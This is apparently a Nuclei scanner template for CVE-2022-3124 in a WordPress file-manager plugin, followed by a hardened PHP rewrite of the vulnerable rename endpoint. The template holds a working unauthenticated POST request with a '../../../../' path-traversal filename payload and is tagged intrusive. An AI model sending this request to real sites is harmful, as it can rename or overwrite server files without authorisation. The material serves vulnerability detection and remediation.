id: CVE-2022-3124

info:
  name: Frontend File Manager < 21.3 - Unauthenticated File Renaming
  author: riteshs4hu
  severity: medium
  description: |
    The Frontend File Manager Plugin WordPress plugin before 21.3 allows any unauthenticated user to rename uploaded files from users. Furthermore, due to the lack of validation in the destination filename, this could allow them to change the content of arbitrary files on the web server.
  impact: |
    Unauthenticated attackers can rename uploaded files and manipulate arbitrary file content on the web server through path traversal, potentially overwriting critical WordPress files or injecting malicious code.
  remediation: |
    Update Frontend File Manager plugin to version 21.3 or later that validates file rename operations and restricts them to authenticated users with proper path validation.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3124
    - https://wpscan.com/vulnerability/00f76765-95af-4dbc-8c37-f1b15a0e8608/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-3124
    cwe-id: CWE-862
    epss-score: 0.08664
    epss-percentile: 0.92606
    cpe: cpe:2.3:a:najeebmedia:frontend_file_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: najeebmedia
    product: frontend_file_manager
    framework: wordpress
    publicwww-query: "/wp-content/plugins/nmedia-user-file-uploader/"
  tags: cve,cve2022,wordpress,wp-plugin,wpscan,nmedia-user-file-uploader,file-upload,intrusive,vkev,vuln

variables:
  rand_string: '{{to_lower(rand_text_alpha(6))}}'

http:
  - raw:
      - |
        POST /wp-json/wpfm/v1/file-rename HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        fileid=1&filename=../../../../{{rand_string}}.php

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '"fileid"\s*:\s*"([^"]+)"'
          - '"filename"\s*:\s*"([^"]+)"'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220272d186f73a40fb16d6d560316cb54bf7ca9b41fdcd86d6bb0772d7468850bf602207024f2d92394de7e72d5e628fce48aa289c6fb652aff966d8702f9dd8381fe33:922c64590222798bb761d5b6d8e72950
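As an added example (not the plugin's code and not part of the template above), this is what a hardened version of the `wpfm/v1/file-rename` endpoint looks like, with the two controls the remediation names: a `permission_callback` that rejects unauthenticated callers (the CWE-862 gap) and destination-filename validation that collapses `../../../../x.php` to a bare, allow-listed filename confined to the upload directory. The `wpfm_lookup_file_path()` storage lookup is a hypothetical helper, since the page does not show how the plugin maps `fileid` to a path.

```php
<?php
// Added example, not the plugin's code: a hardened rename endpoint.
// The route shape mirrors the template's request; wpfm_lookup_file_path() is a
// hypothetical lookup for the plugin's storage, which the page does not show.

add_action( 'rest_api_init', function () {
    register_rest_route( 'wpfm/v1', '/file-rename', array(
        'methods'             => 'POST',
        'callback'            => 'wpfm_example_rename',
        // CWE-862 fix: the vulnerable endpoint had no authorization check.
        'permission_callback' => function () {
            return is_user_logged_in() && current_user_can( 'upload_files' );
        },
        'args' => array(
            'fileid'   => array( 'required' => true, 'sanitize_callback' => 'absint' ),
            'filename' => array( 'required' => true ),
        ),
    ) );
} );

function wpfm_example_rename( WP_REST_Request $request ) {
    $file_id  = $request->get_param( 'fileid' );
    $current  = wpfm_lookup_file_path( $file_id, get_current_user_id() ); // hypothetical
    if ( ! $current || ! is_file( $current ) ) {
        return new WP_Error( 'not_found', 'Unknown file', array( 'status' => 404 ) );
    }

    // Traversal fix: keep only the last path segment, then let WordPress strip
    // separators and leading dots. "../../../../x.php" becomes "x.php".
    $safe_name = sanitize_file_name( basename( (string) $request->get_param( 'filename' ) ) );
    if ( '' === $safe_name ) {
        return new WP_Error( 'bad_name', 'Invalid filename', array( 'status' => 400 ) );
    }
    // Extension must be one WordPress allows for uploads; ".php" is rejected here.
    if ( empty( wp_check_filetype( $safe_name )['ext'] ) ) {
        return new WP_Error( 'bad_type', 'File type not permitted', array( 'status' => 400 ) );
    }
    // Defence in depth: the resolved destination stays inside the upload base directory.
    $base = realpath( wp_upload_dir()['basedir'] );
    $dir  = realpath( dirname( $current ) );
    if ( ! $base || ! $dir || 0 !== strpos( $dir . DIRECTORY_SEPARATOR, $base . DIRECTORY_SEPARATOR ) ) {
        return new WP_Error( 'bad_path', 'Path outside upload directory', array( 'status' => 400 ) );
    }
    $target = $dir . DIRECTORY_SEPARATOR . $safe_name;
    if ( file_exists( $target ) || ! rename( $current, $target ) ) {
        return new WP_Error( 'rename_failed', 'Rename failed', array( 'status' => 409 ) );
    }
    return rest_ensure_response( array( 'fileid' => (string) $file_id, 'filename' => $safe_name ) );
}
```

With these checks in place the template's request fails at the `permission_callback` (HTTP 401/403 from the REST API), and even an authenticated caller sending the traversal payload only ever renames within the upload directory to a non-executable extension.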